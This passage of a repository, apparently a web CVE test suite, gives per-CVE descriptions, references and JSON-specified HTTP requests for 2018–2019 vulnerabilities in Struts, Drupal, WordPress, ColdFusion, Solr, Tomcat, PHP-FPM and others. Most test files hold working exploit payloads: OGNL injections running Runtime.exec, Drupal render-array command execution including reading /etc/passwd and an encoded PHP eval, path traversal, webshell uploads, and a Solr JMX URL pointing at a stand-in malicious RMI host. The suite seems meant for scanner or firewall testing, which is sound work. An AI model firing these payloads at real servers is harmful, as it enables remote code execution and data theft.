?mimeType=text/html",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": "https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html"
10 | }
11 | ]
--------------------------------------------------------------------------------
/tests/CVE-2018-1000130/description.txt:
--------------------------------------------------------------------------------
1 | A JNDI Injection vulnerability exists in Jolokia agent version 1.3.7 in the
2 | proxy mode that allows a remote attacker to run arbitrary Java code on the
3 | server.
--------------------------------------------------------------------------------
/tests/CVE-2018-1000130/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000130
--------------------------------------------------------------------------------
/tests/CVE-2018-1000130/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/jolokia/",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close",
8 | "Content-Type": "application/x-www-form-urlencoded",
9 | "Content-Length": "206"
10 | },
11 | "Data-File": "test1.txt",
12 | "Reference": "https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html"
13 | }
14 | ]
--------------------------------------------------------------------------------
/tests/CVE-2018-1000130/test1.txt:
--------------------------------------------------------------------------------
1 | {
2 | "type" : "read",
3 | "mbean" : "java.lang:type=Memory",
4 | "target" : {
5 | "url" : "service:jmx:rmi:///jndi/ldap://localhost:9092/jmxrmi"
6 | }
7 | }
--------------------------------------------------------------------------------
/tests/CVE-2018-11776/description.txt:
--------------------------------------------------------------------------------
1 | Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible
2 | Remote Code Execution when alwaysSelectFullNamespace is true (either by user or
3 | a plugin like Convention Plugin) and then: results are used with no namespace
4 | and in same time, its upper package have no or wildcard namespace and similar
5 | to results, same possibility when using url tag which doesn't have value and
6 | action set and in same time, its upper package have no or wildcard namespace.
--------------------------------------------------------------------------------
/tests/CVE-2018-11776/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776
2 | https://cwiki.apache.org/confluence/display/WW/S2-057
--------------------------------------------------------------------------------
/tests/CVE-2018-11776/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/struts3-showcase/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27touch%20/tmp/jas502n%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | }
8 | },
9 | {
10 | "Method": "GET",
11 | "URI": "/struts2-showcase/${(111+111)}/actionChain1.action",
12 | "Headers": {
13 | "User-Agent": "Mozilla/5.0"
14 | }
15 | },
16 | {
17 | "Method": "GET",
18 | "URI": "/struts2-showcase/$%7b(111+111)%7d/actionChain1.action",
19 | "Headers": {
20 | "User-Agent": "Mozilla/5.0"
21 | }
22 | },{
23 | "Method": "GET",
24 | "URI": "/%24%7B%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2C@java.lang.Runtime@getRuntime%28%29.exec%28%27calc.exe%27%29%7D/index.action",
25 | "Headers": {
26 | "User-Agent": "Mozilla/5.0"
27 | },
28 | "Reference": "https://github.com/Ivan1ee/struts2-057-exp"
29 | },
30 | {
31 | "Method": "GET",
32 | "URI": "/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27calc.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/",
33 | "Headers": {
34 | "User-Agent": "Mozilla/5.0"
35 | },
36 | "Reference": "https://github.com/Ivan1ee/struts2-057-exp"
37 | },
38 | {
39 | "Method": "GET",
40 | "URI": "/%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27calc.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action",
41 | "Headers": {
42 | "User-Agent": "Mozilla/5.0"
43 | },
44 | "Reference": "https://github.com/Ivan1ee/struts2-057-exp"
45 | },
46 | {
47 | "Method": "GET",
48 | "URI": "/%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27FUZZINGCOMMAND%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D",
49 | "Headers": {
50 | "User-Agent": "Mozilla/5.0"
51 | },
52 | "Reference": "https://github.com/Lucifer1993/struts-scan/blob/master/struts-scan.py"
53 | },
54 | {
55 | "Method": "GET",
56 | "URI": "/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27FUZZINGCOMMAND%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D",
57 | "Headers": {
58 | "User-Agent": "Mozilla/5.0"
59 | },
60 | "Reference": "https://github.com/Lucifer1993/struts-scan/blob/master/struts-scan.py"
61 | }
62 | ]
63 |
--------------------------------------------------------------------------------
/tests/CVE-2018-1327/description.txt:
--------------------------------------------------------------------------------
1 | The Apache Struts REST Plugin is using XStream library which is vulnerable and
2 | allow perform a DoS attack when using a malicious request with specially
3 | crafted XML payload. Upgrade to the Apache Struts version 2.5.16 and switch to
4 | an optional Jackson XML handler as described here
5 | http://struts.apache.org/plugins/rest/#custom-contenttypehandlers. Another
6 | option is to implement a custom XML handler based on the Jackson XML handler
7 | from the Apache Struts 2.5.16.
--------------------------------------------------------------------------------
/tests/CVE-2018-1327/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1327
--------------------------------------------------------------------------------
/tests/CVE-2018-1327/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/struts2-rest-showcase/orders/6",
5 | "Headers": {
6 | "Content-Type": "application/xml",
7 | "Content-Length": "3334",
8 | "charset": "UTF-8",
9 | "User-Agent": "Mozilla/5.0",
10 | "Connection": "close"
11 | },
12 | "Data-File": "test1.xml",
13 | "Reference": "https://github.com/iBearcat/S2-056-XStream"
14 | }
15 | ]
--------------------------------------------------------------------------------
/tests/CVE-2018-1327/test1.xml:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/tests/CVE-2018-15961/description.txt:
--------------------------------------------------------------------------------
1 | Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and
2 | earlier, and Update 14 and earlier have an unrestricted file upload
3 | vulnerability. Successful exploitation could lead to arbitrary code execution.
--------------------------------------------------------------------------------
/tests/CVE-2018-15961/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15961
--------------------------------------------------------------------------------
/tests/CVE-2018-15961/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close",
8 | "Content-Type": "multipart/form-data; boundary=---------------------------24464570528145",
9 | "Content-Length": "303",
10 | "Upgrade-Insecure-Requests": "1"
11 | },
12 | "Data-File": "test1.txt",
13 | "Reference": "https://github.com/vah13/CVE-2018-15961"
14 | }
15 | ]
16 |
--------------------------------------------------------------------------------
/tests/CVE-2018-15961/test1.txt:
--------------------------------------------------------------------------------
1 | -----------------------------24464570528145
2 | Content-Disposition: form-data; name="file"; filename="shell"
3 | Content-Type: image/jpeg
4 |
5 | %%%%%%%%
6 | -----------------------------24464570528145
7 | Content-Disposition: form-data; name="path"
8 |
9 | shell
10 | -----------------------------24464570528145--
--------------------------------------------------------------------------------
/tests/CVE-2018-20062/description.txt:
--------------------------------------------------------------------------------
1 | An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows
2 | remote attackers to execute arbitrary PHP code via crafted use of the filter
3 | parameter, as demonstrated by the
4 | s=index/\think\Request/input&filter=phpinfo&data=1 query string.
--------------------------------------------------------------------------------
/tests/CVE-2018-20062/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20062
--------------------------------------------------------------------------------
/tests/CVE-2018-20062/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/noneCms/public/?s=index/\\think\\Request/input&filter=phpinfo&data=1",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | },
8 | "Reference": "https://github.com/nangge/noneCms/issues/21"
9 | },
10 | {
11 | "Method": "GET",
12 | "URI": "/?s=index/\\think\\Request/input&filter=phpinfo&data=1",
13 | "Headers": {
14 | "User-Agent": "Mozilla/5.0"
15 | },
16 | "Reference": "https://github.com/nangge/noneCms/issues/21"
17 | }
18 | ]
19 |
--------------------------------------------------------------------------------
/tests/CVE-2018-3252/PoC-3252.ser:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/foospidy/web-cve-tests/0162a7c5cc4782258b7607aca771bf643d0f7e1b/tests/CVE-2018-3252/PoC-3252.ser
--------------------------------------------------------------------------------
/tests/CVE-2018-3252/description.txt:
--------------------------------------------------------------------------------
1 | Vulnerability in the Oracle WebLogic Server component of Oracle Fusion
2 | Middleware (subcomponent: WLS Core Components). Supported versions that are
3 | affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability
4 | allows unauthenticated attacker with network access via T3 to compromise
5 | Oracle WebLogic Server. Successful attacks of this vulnerability can result in
6 | takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality,
7 | Integrity and Availability impacts). CVSS Vector:
8 | (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
--------------------------------------------------------------------------------
/tests/CVE-2018-3252/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3252
--------------------------------------------------------------------------------
/tests/CVE-2018-3252/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/bea_wls_deployment_internal/DeploymentService",
5 | "Headers": {
6 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
7 | "Upgrade-Insecure-Requests": "1",
8 | "wl_request_type": "data_transfer_request",
9 | "username": "weblogic",
10 | "password": "weblogic",
11 | "serverName": "web-cve-tests",
12 | "deployment_request_id": "1",
13 | "Accept-Encoding": "gzip, deflate",
14 | "Accept-Language": "zh-CN,zh;q=0.8",
15 | "Connection": "close",
16 | "Content-Length": "3334",
17 | "User-Agent": "Mozilla/5.0"
18 | },
19 | "Data-Binary-File": "PoC-3252.ser",
20 | "Reference": "https://github.com/pyn3rd/CVE-2018-3252"
21 | }
22 | ]
--------------------------------------------------------------------------------
/tests/CVE-2018-6389/description.txt:
--------------------------------------------------------------------------------
1 | In WordPress through 4.9.2, unauthenticated attackers can cause a denial of
2 | service (resource consumption) by using the large list of registered .js files
3 | (from wp-includes/script-loader.php) to construct a series of requests to load
4 | every file many times.
--------------------------------------------------------------------------------
/tests/CVE-2018-6389/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
--------------------------------------------------------------------------------
/tests/CVE-2018-7422/description.txt:
--------------------------------------------------------------------------------
1 | A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1
2 | for WordPress allows remote attackers to retrieve arbitrary files via the
3 | ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php,
4 | aka absolute path traversal.
--------------------------------------------------------------------------------
/tests/CVE-2018-7422/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
--------------------------------------------------------------------------------
/tests/CVE-2018-7422/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | },
8 | "Reference": "https://www.exploit-db.com/exploits/44340"
9 | }
10 | ]
--------------------------------------------------------------------------------
/tests/CVE-2018-7490/description.txt:
--------------------------------------------------------------------------------
1 | uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the
2 | --php-docroot option, allowing directory traversal.
--------------------------------------------------------------------------------
/tests/CVE-2018-7490/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7490
--------------------------------------------------------------------------------
/tests/CVE-2018-7490/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/..%2f..%2f..%2f..%2f..%2fetc/passwd",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | },
8 | "Reference": "https://www.exploit-db.com/exploits/44223"
9 | }
10 | ]
--------------------------------------------------------------------------------
/tests/CVE-2018-7600/description.txt:
--------------------------------------------------------------------------------
1 | Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before
2 | 8.5.1 allows remote attackers to execute arbitrary code because of an issue
3 | affecting multiple subsystems with default or common module configurations.
--------------------------------------------------------------------------------
/tests/CVE-2018-7600/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600
--------------------------------------------------------------------------------
/tests/CVE-2018-7600/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded",
8 | "Connection": "close"
9 | },
10 | "Data": {
11 | "form_id": "user_register_form",
12 | "_drupal_ajax": "1",
13 | "mail[#post_render][]": "exec",
14 | "mail[#type]": "markup",
15 | "mail[#markup]": "echo \";-)\" | tee hello.txt"
16 | },
17 | "Reference": "https://www.exploit-db.com/exploits/44448"
18 | },
19 | {
20 | "Method": "POST",
21 | "URI": "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax",
22 | "Headers": {
23 | "User-Agent": "Mozilla/5.0",
24 | "Content-Type": "application/x-www-form-urlencoded",
25 | "Connection": "close"
26 | },
27 | "Data": {
28 | "form_id": "user_register_form",
29 | "_drupal_ajax": "1",
30 | "mail[#post_render][]": "exec",
31 | "mail[#type]": "markup",
32 | "mail[#markup]": "php -r 'eval(base64_decode(cGhwL21ldGVycHJldGVyL3JldmVyc2VfdGNw));'"
33 | },
34 | "Reference": "https://www.exploit-db.com/exploits/44482"
35 | }
36 | ]
--------------------------------------------------------------------------------
/tests/CVE-2018-7602/description.txt:
--------------------------------------------------------------------------------
1 | A remote code execution vulnerability exists within multiple subsystems of
2 | Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple
3 | attack vectors on a Drupal site, which could result in the site being
4 | compromised. This vulnerability is related to Drupal core - Highly critical -
5 | Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this
6 | vulnerability are being exploited in the wild.
--------------------------------------------------------------------------------
/tests/CVE-2018-7602/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7602
--------------------------------------------------------------------------------
/tests/CVE-2018-7602/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/?q=testuser/cancel&destination=testuser/cancel?q[#post_render][]=passthru&q[#type]=markup&q[#markup]=cat+/etc/passwd",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded"
8 | },
9 | "Data": {
10 | "triggering_element_name": "form_id",
11 | "form_token": "csrf-hKyeyIYxk-e4qT1sdZ6nWHq0xuHcH2BMWk3vMWaSExU",
12 | "form_id": "user_cancel_confirm_form",
13 | "op": "Cancel+account"
14 | },
15 | "Reference": "https://github.com/pimps/CVE-2018-7600"
16 | },
17 | {
18 | "Method": "POST",
19 | "URI": "/?q=file/ajax/actions/cancel/#options/path/form-hKyeyIYxk-e4qT1sdZ6nWHq0xuHcH2BMWk3vMWaSExU",
20 | "Headers": {
21 | "User-Agent": "Mozilla/5.0",
22 | "Content-Type": "application/x-www-form-urlencoded"
23 | },
24 | "Data": {
25 | "form_build_id": "form-hKyeyIYxk-e4qT1sdZ6nWHq0xuHcH2BMWk3vMWaSExU"
26 | },
27 | "Reference": "https://github.com/pimps/CVE-2018-7600"
28 | }
29 | ]
--------------------------------------------------------------------------------
/tests/CVE-2018-9206/description.txt:
--------------------------------------------------------------------------------
1 | Unauthenticated arbitrary file upload vulnerability in Blueimp
2 | jQuery-File-Upload <= v9.22.0
--------------------------------------------------------------------------------
/tests/CVE-2018-9206/file1.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/tests/CVE-2018-9206/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9206
--------------------------------------------------------------------------------
/tests/CVE-2018-9206/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/server/php/upload.class.php",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "multipart/form-data"
8 | },
9 | "File-Upload-Name": "scoobydoo.php",
10 | "File-Upload-File": "file1.txt",
11 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
12 | },
13 | {
14 | "Method": "POST",
15 | "URI": "/example/upload.php",
16 | "Headers": {
17 | "User-Agent": "Mozilla/5.0",
18 | "Content-Type": "multipart/form-data"
19 | },
20 | "File-Upload-Name": "scoobydoo.php",
21 | "File-Upload-File": "file1.txt",
22 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
23 | },
24 | {
25 | "Method": "POST",
26 | "URI": "/server/php/UploadHandler.php",
27 | "Headers": {
28 | "User-Agent": "Mozilla/5.0",
29 | "Content-Type": "multipart/form-data"
30 | },
31 | "File-Upload-Name": "scoobydoo.php",
32 | "File-Upload-File": "file1.txt",
33 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
34 | },
35 | {
36 | "Method": "POST",
37 | "URI": "/php/index.php",
38 | "Headers": {
39 | "User-Agent": "Mozilla/5.0",
40 | "Content-Type": "multipart/form-data"
41 | },
42 | "File-Upload-Name": "scoobydoo.php",
43 | "File-Upload-File": "file1.txt",
44 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
45 | },
46 | {
47 | "Method": "POST",
48 | "URI": "/jQuery-File-Upload/server/php/upload.class.php",
49 | "Headers": {
50 | "User-Agent": "Mozilla/5.0",
51 | "Content-Type": "multipart/form-data"
52 | },
53 | "File-Upload-Name": "scoobydoo.php",
54 | "File-Upload-File": "file1.txt",
55 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
56 | },
57 | {
58 | "Method": "POST",
59 | "URI": "/jQuery-File-Upload/example/upload.php",
60 | "Headers": {
61 | "User-Agent": "Mozilla/5.0",
62 | "Content-Type": "multipart/form-data"
63 | },
64 | "File-Upload-Name": "scoobydoo.php",
65 | "File-Upload-File": "file1.txt",
66 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
67 | },
68 | {
69 | "Method": "POST",
70 | "URI": "/jQuery-File-Upload/server/php/UploadHandler.php",
71 | "Headers": {
72 | "User-Agent": "Mozilla/5.0",
73 | "Content-Type": "multipart/form-data"
74 | },
75 | "File-Upload-Name": "scoobydoo.php",
76 | "File-Upload-File": "file1.txt",
77 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
78 | },
79 | {
80 | "Method": "POST",
81 | "URI": "/jQuery-File-Upload/php/index.php",
82 | "Headers": {
83 | "User-Agent": "Mozilla/5.0",
84 | "Content-Type": "multipart/form-data"
85 | },
86 | "File-Upload-Name": "scoobydoo.php",
87 | "File-Upload-File": "file1.txt",
88 | "Reference": "https://github.com/Den1al/CVE-2018-9206/blob/master/run.py"
89 | }
90 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-0192/description.txt:
--------------------------------------------------------------------------------
1 | In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API
2 | allows to configure the JMX server via an HTTP POST request. By pointing
3 | it to a malicious RMI server, an attacker could take advantage of Solr's
4 | unsafe deserialization to trigger remote code execution on the Solr side.
--------------------------------------------------------------------------------
/tests/CVE-2019-0192/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0192
--------------------------------------------------------------------------------
/tests/CVE-2019-0192/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/solr/techproducts/config/jmx",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/json"
8 | },
9 | "Data-File": "test1.txt",
10 | "Reference": "https://github.com/mpgn/CVE-2019-0192"
11 | }
12 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-0192/test1.txt:
--------------------------------------------------------------------------------
1 | {
2 | "set-property": {
3 | "jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj"
4 | }
5 | }
--------------------------------------------------------------------------------
/tests/CVE-2019-0232/description.txt:
--------------------------------------------------------------------------------
1 | When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in
2 | Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is
3 | vulnerable to Remote Code Execution due to a bug in the way the JRE passes
4 | command line arguments to Windows. The CGI Servlet is disabled by default. The
5 | CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and
6 | will be disabled by default in all versions in response to this vulnerability).
7 | For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog
8 | (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html)
9 | and this archived MSDN blog
10 | (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/
11 | twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
--------------------------------------------------------------------------------
/tests/CVE-2019-0232/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0232
2 | https://mail-archives.us.apache.org/mod_mbox/www-announce/201904.mbox/%3C13d878ec-5d49-c348-48d4-25a6c81b9605%40apache.org%3E
--------------------------------------------------------------------------------
/tests/CVE-2019-0232/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Ccalc.exe",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | },
8 | "Reference": "https://github.com/pyn3rd/CVE-2019-0232"
9 | },
10 | {
11 | "Method": "GET",
12 | "URI": "/cgi-bin/hello.bat?&net+user",
13 | "Headers": {
14 | "User-Agent": "Mozilla/5.0"
15 | },
16 | "Reference": "https://github.com/pyn3rd/CVE-2019-0232"
17 | },
18 | {
19 | "Method": "POST",
20 | "URI": "/cgi-bin/hello.bat?&net+user",
21 | "Headers": {
22 | "User-Agent": "Mozilla/5.0"
23 | },
24 | "Data": {
25 | "hokus": "bogus"
26 | },
27 | "Reference": "https://github.com/pyn3rd/CVE-2019-0232"
28 | },
29 | {
30 | "Method": "GET",
31 | "URI": "/cgi-bin/hello.cmd?&C%3A%5CWindows%5CSystem32%5Ccalc.exe",
32 | "Headers": {
33 | "User-Agent": "Mozilla/5.0"
34 | },
35 | "Reference": ""
36 | },
37 | {
38 | "Method": "GET",
39 | "URI": "/cgi-bin/hello.cmd?&net+user",
40 | "Headers": {
41 | "User-Agent": "Mozilla/5.0"
42 | },
43 | "Reference": ""
44 | },
45 | {
46 | "Method": "POST",
47 | "URI": "/cgi-bin/hello.cmd?&net+user",
48 | "Headers": {
49 | "User-Agent": "Mozilla/5.0"
50 | },
51 | "Data": {
52 | "hokus": "bogus"
53 | },
54 | "Reference": ""
55 | }
56 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-11043/description.txt:
--------------------------------------------------------------------------------
1 | In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11
2 | in certain configurations of FPM setup it is possible to cause FPM module to
3 | write past allocated buffers into the space reserved for FCGI protocol data,
4 | thus opening the possibility of remote code execution.
--------------------------------------------------------------------------------
/tests/CVE-2019-11043/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11043
--------------------------------------------------------------------------------
/tests/CVE-2019-11043/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/index.php/path%0Ainfo.php?QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ